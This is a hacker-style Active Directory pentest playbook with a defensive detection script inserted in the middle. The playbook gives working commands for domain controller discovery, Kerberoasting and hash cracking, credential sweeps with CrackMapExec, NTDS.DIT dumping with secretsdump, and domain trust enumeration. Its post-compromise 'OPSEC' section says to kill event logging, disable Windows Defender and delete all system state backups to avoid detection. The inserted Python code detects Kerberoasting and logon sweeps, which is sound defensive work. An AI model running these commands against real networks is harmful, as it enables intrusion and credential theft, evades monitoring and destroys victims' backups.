#
The Official phasetw0 Corporate Internal Active Directory Pentest Playbook and Knuckles
#
Written by hypervis0r
I'll be adding more to this as I own more domains lol
#
🔎 Initial Access
#
Identify Target Machines
Identify domain controllers on the network using DNS
# Linux
dig _ldap._tcp.dc._msdcs.EXAMPLE.COM -t any
dig _ldap._tcp.dc._msdcs.EXAMPLE.COM -t srv
# Windows
nslookup -type=any _ldap._tcp.dc._msdcs.EXAMPLE.COM
nslookup -type=srv _ldap._tcp.dc._msdcs.EXAMPLE.COM
Find potential Windows machines using nmap against the network subnet or the given scope of the pentest.
nmap -p139,445,88,135,389,464 <subnet here> -oG - | awk '/Up$/{print $2}' > windows_boxes.txt
#
Low hanging Fruit
Check Windows boxes for common CVEs (EternalBlue, other SMB vulns I can't think of, etc.)
# nmap scan
nmap -sC -sV -oN box_scan.txt -iL windows_boxes.txt
# crackmapexec scan
cme smb ~/windows_boxes.txt
#
Identify critical users
Nine times out of ten, network administrators of a company are admins on the internal domain. Look for staff directories for the company to find potential users to phish/brute-force.
# Google dork to find staff directory of company
site:"evil.corp" staff directory
#
🚩 Lateral movement (after found creds)
/*
TODO:
More AD Flaws (Golden Ticket)
LSASS Dumping
*/
Repeat these steps for every new, better set of credentials you obtain, until you reach Local Admin or Domain Admin.
#
Check common Active Directory flaws
#
Kerberoasting/AS-REPRoasting
Check for users with associated SPNs using impacket's GetUserSPNs.py.
# -request asks the DC for a service ticket for every SPN found and writes the hashes to the output file
python3 GetUserSPNs.py evil.corp/user:pass -dc-ip dc1.evil.corp -request -outputfile hashes.tgt
After obtaining the ticket hashes (hashcat mode 13100, Kerberos 5 TGS-REP etype 23), crack the user password using hashcat along with rockyou.txt and OneRuleToRuleThemAll.rule. This can take a while to crack, even on a powerful home PC. Unless you have a dedicated cracking machine, I recommend spinning up an Azure instance (specifically Standard NC6s_v3).
# -r takes the rules file (hashcat has no --rule option)
hashcat -m 13100 -w 4 -a 0 hashes.tgt rockyou.txt -r OneRuleToRuleThemAll.rule
If no hashes could be cracked, it is unlikely the passwords are brute-forceable, and you should move on.
#
Pop shell to investigate
Find machines you can potentially log into using your credentials. You can accomplish this using CrackMapExec with the windows_boxes.txt list to scan every Windows box, and its SMB shares, with your creds.
# Check for shells
cme smb ~/windows_boxes.txt -u 'user' -p 'pass'
# Check for open SMB shares
cme smb ~/windows_boxes.txt -u 'user' -p 'pass' --shares
After you gain a shell (or find an interesting open share), look around for saved password files, ways to escalate to local admin, "goodies", etc.
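From the defender's side, the Kerberoasting step and the CrackMapExec credential sweep above leave the same shape in the logs: one actor touching many distinct targets in a short window. The block below is an added example (not part of the original playbook, impacket or CrackMapExec) that generalises that pattern into one sliding-window detector and applies it twice: to Security event 4769 (TGS requests; RC4 etype 0x17 is exactly what hashcat -m 13100 consumes) and to Security event 4624 with LogonType 3 (network logons, one per host that accepted the credential). The log lines are constructed, and the flat `TIMESTAMP key=value ...` format is an assumed SIEM export shape; field names follow the real event fields (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, LogonType, Computer).

```python
"""Fan-out detections for Kerberoasting and credential sweeps.

Added example, not the playbook's or any tool's own code. Input: flat
'TIMESTAMP key=value ...' lines (assumed SIEM export); all events below
are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23: the ticket type hashcat -m 13100 cracks

# Constructed 4769 events: alice requests RC4 tickets for four service
# accounts in four seconds; bob's requests are to a machine account,
# to krbtgt, or AES (0x12), all of which are normal noise.
SAMPLE_4769 = """\
2024-05-01T10:00:01 Computer=DC1 EventID=4769 TargetUserName=alice@EVIL.CORP ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.0.0.55
2024-05-01T10:00:02 Computer=DC1 EventID=4769 TargetUserName=alice@EVIL.CORP ServiceName=http_svc TicketEncryptionType=0x17 IpAddress=10.0.0.55
2024-05-01T10:00:03 Computer=DC1 EventID=4769 TargetUserName=alice@EVIL.CORP ServiceName=backup_svc TicketEncryptionType=0x17 IpAddress=10.0.0.55
2024-05-01T10:00:04 Computer=DC1 EventID=4769 TargetUserName=alice@EVIL.CORP ServiceName=mssql_svc TicketEncryptionType=0x17 IpAddress=10.0.0.55
2024-05-01T10:00:05 Computer=DC1 EventID=4769 TargetUserName=bob@EVIL.CORP ServiceName=WS01$ TicketEncryptionType=0x17 IpAddress=10.0.0.60
2024-05-01T10:00:06 Computer=DC1 EventID=4769 TargetUserName=bob@EVIL.CORP ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.60
2024-05-01T10:00:07 Computer=DC1 EventID=4769 TargetUserName=bob@EVIL.CORP ServiceName=sqlsvc TicketEncryptionType=0x12 IpAddress=10.0.0.60
"""

# Constructed 4624 events: one credential from 10.0.0.55 logs on over the
# network to four hosts within a minute; carol's single logon is normal and
# alice's interactive logon (type 2) is not part of a sweep.
SAMPLE_4624 = """\
2024-05-01T11:00:00 Computer=WS01 EventID=4624 TargetUserName=alice LogonType=3 IpAddress=10.0.0.55
2024-05-01T11:00:10 Computer=WS02 EventID=4624 TargetUserName=alice LogonType=3 IpAddress=10.0.0.55
2024-05-01T11:00:20 Computer=FS01 EventID=4624 TargetUserName=alice LogonType=3 IpAddress=10.0.0.55
2024-05-01T11:00:30 Computer=DC1 EventID=4624 TargetUserName=alice LogonType=3 IpAddress=10.0.0.55
2024-05-01T11:00:40 Computer=FS01 EventID=4624 TargetUserName=carol LogonType=3 IpAddress=10.0.0.70
2024-05-01T11:00:50 Computer=WS03 EventID=4624 TargetUserName=alice LogonType=2 IpAddress=127.0.0.1
"""


def parse_events(text):
    """'TIMESTAMP k=v k=v ...' lines -> list of dicts with a datetime 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _, rest = line.partition(" ")
        ev = dict(kv.split("=", 1) for kv in rest.split())
        ev["ts"] = datetime.fromisoformat(ts)
        events.append(ev)
    return events


def fan_out(events, actor, target, window, min_targets):
    """{actor: sorted targets} for every actor that touches at least
    min_targets distinct targets inside some sliding window.
    actor/target are a field name or a tuple of field names."""
    def key(ev, spec):
        if isinstance(spec, tuple):
            return tuple(ev.get(f, "") for f in spec)
        return ev.get(spec, "")

    by_actor = defaultdict(list)
    for ev in events:
        by_actor[key(ev, actor)].append((ev["ts"], key(ev, target)))
    hits = {}
    for who, touches in by_actor.items():
        touches.sort()
        for i, (start, _) in enumerate(touches):
            seen = {t for ts, t in touches[i:] if ts - start <= window}
            if len(seen) >= min_targets:
                hits.setdefault(who, set()).update(seen)
    return {who: sorted(s) for who, s in hits.items()}


def detect_kerberoast(text, window=timedelta(minutes=5), min_services=3):
    """RC4 service-ticket requests for many SPN accounts by one principal.
    Machine accounts ($) and krbtgt are excluded as routine traffic."""
    roastable = [ev for ev in parse_events(text)
                 if ev.get("EventID") == "4769"
                 and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
                 and not ev.get("ServiceName", "").endswith("$")
                 and ev.get("ServiceName", "").lower() != "krbtgt"]
    return fan_out(roastable, "TargetUserName", "ServiceName", window, min_services)


def detect_logon_sweep(text, window=timedelta(minutes=5), min_hosts=3):
    """One account + source address producing network logons on many hosts."""
    net = [ev for ev in parse_events(text)
           if ev.get("EventID") == "4624" and ev.get("LogonType") == "3"]
    return fan_out(net, ("TargetUserName", "IpAddress"), "Computer", window, min_hosts)


if __name__ == "__main__":
    print("kerberoast:", detect_kerberoast(SAMPLE_4769))
    print("logon sweep:", detect_logon_sweep(SAMPLE_4624))
```

The thresholds are deliberately parameters: a service desk account may legitimately hit many hosts, and an application may hold several SPNs, so tune `window` and `min_targets` to the environment rather than to this sample. The corresponding mitigations are the ones that make the logged events harmless: service accounts restricted to AES (so 4769 shows etype 0x12/0x11 and there is no RC4 ticket to crack) or replaced with group managed service accounts, and credentials that are not valid on every host, so a sweep yields failures rather than a list of footholds.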
#
🔥 Next steps after Domain Admin
#
OPSEC (These Steps are important!!!)
Kill the Windows Event Logging service using phant0m or some other method.
Disable the Windows Defender service, and look for any other EDRs to possibly disable before continuing.
# Stop the Windows Defender service, then disable it
sc stop "WinDefend"
sc config "WinDefend" start= disabled
#
Persistence
Run impacket's secretsdump.py to dump NTLM hashes from SAM, NTDS.DIT, and other hives.
python3 secretsdump.py evil.corp/Administrator:password@dc1.evil.corp
#
Check for backups
You wouldn't want to get discovered and risk a full wipe and restore from backup, would you? If you are looking to make yourself at home for a long time, you may want to look for system backups and promptly destroy them.
# Delete all system state backups
wbadmin delete systemstatebackup -keepVersions:0
#
Enterprise Admin?
The domain you have just owned may have been a child domain of a larger parent domain. Exploit trust boundaries to gain Enterprise Admin, and own the whole tri-state area!
# Get list of domain trusts to find new DCs to own
nltest /domain_trusts
#
📕 References
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
https://github.com/SecureAuthCorp/impacket
https://github.com/byt3bl33d3r/CrackMapExec